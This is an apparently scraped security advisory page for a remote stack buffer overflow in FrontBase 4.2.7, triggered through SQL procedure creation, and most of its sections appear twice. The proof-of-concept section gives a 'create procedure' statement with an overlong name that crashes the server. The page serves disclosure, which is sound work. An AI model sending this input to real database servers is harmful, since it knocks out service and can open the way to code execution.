FrontBase Relational Database Server Procedure Buffer Overflow Vulnerability
BID:23007
Info
FrontBase Relational Database Server Procedure Buffer Overflow Vulnerability
| Bugtraq ID: | 23007 |
| Class: | Boundary Condition Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Mar 16 2007 12:00AM |
| Updated: | Apr 03 2007 06:22PM |
| Credit: | Kevin Finisterre is credited with the discovery of this vulnerability. |
| Vulnerable: |
FrontBase FrontBase 4.2.7 |
| Not Vulnerable: | |
Discussion
FrontBase Relational Database Server Procedure Buffer Overflow Vulnerability
FrontBase Relational Database Server is prone to a remote stack-based buffer-overflow vulnerability because the application fails to properly bounds-check user-supplied input before copying it to an insufficiently sized memory buffer.
Attackers must have permission to create SQL-procedures requests.
Exploiting this issue allows attackers to execute arbitrary machine code with superuser or SYSTEM-Level privileges. This will result in a complete compromise of affected computers. Failed exploit attempts will likely result in denial-of-service conditions.
This issue affects FrontBase 4.2.7 and prior versions.
FrontBase Relational Database Server is prone to a remote stack-based buffer-overflow vulnerability because the application fails to properly bounds-check user-supplied input before copying it to an insufficiently sized memory buffer.
Attackers must have permission to create SQL-procedures requests.
Exploiting this issue allows attackers to execute arbitrary machine code with superuser or SYSTEM-Level privileges. This will result in a complete compromise of affected computers. Failed exploit attempts will likely result in denial-of-service conditions.
This issue affects FrontBase 4.2.7 and prior versions.
Exploit / POC
FrontBase Relational Database Server Procedure Buffer Overflow Vulnerability
The following proofs of concept are available:
create procedure
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
....
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"()
begin
end;
The following proofs of concept are available:
create procedure
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
....
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"()
begin
end;
Solution / Fix
FrontBase Relational Database Server Procedure Buffer Overflow Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: mailto:[email protected].
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: mailto:[email protected].
References
FrontBase Relational Database Server Procedure Buffer Overflow Vulnerability
References:
References:
- [NETRAGARD-20070316 SECURITY ADVISORY][FrontBase Database <= 4.2.7> ALL PLATFOR (Netragard Security Advisories)
- FrontBase Homepage (FrontBase)